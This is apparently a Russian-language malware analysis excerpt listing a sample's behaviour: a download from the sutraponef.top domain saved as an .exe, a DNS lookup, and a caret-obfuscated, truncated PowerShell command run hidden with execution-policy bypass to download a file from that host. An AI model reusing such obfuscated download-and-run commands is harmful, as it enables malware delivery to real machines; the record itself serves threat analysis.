Техническая информация
- http://sutraponef.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "Po^we^R^ShEL^L.exe ^-^Ex^E^CutiONPoLiC^Y ^BY^pass ^-nop^roFI^L^e ^-w^In^D^Ow^sT^YLe ^h^IdDEN^ (^nE^W-object^ ^SysTem.^nET^.WE^bC^Lie^N^T^)^.DOW^nlOadfilE(^'http://sutraponef.top/rea...
- DNS ASK su###ponef.top
- '<SYSTEM32>\cmd.exe' /c "Po^we^R^ShEL^L.exe ^-^Ex^E^CutiONPoLiC^Y ^BY^pass ^-nop^roFI^L^e ^-w^In^D^Ow^sT^YLe ^h^IdDEN^ (^nE^W-object^ ^SysTem.^nET^.WE^bC^Lie^N^T^)^.DOW^nlOadfilE(^'http://sutraponef.top/rea...' (со скрытым окном)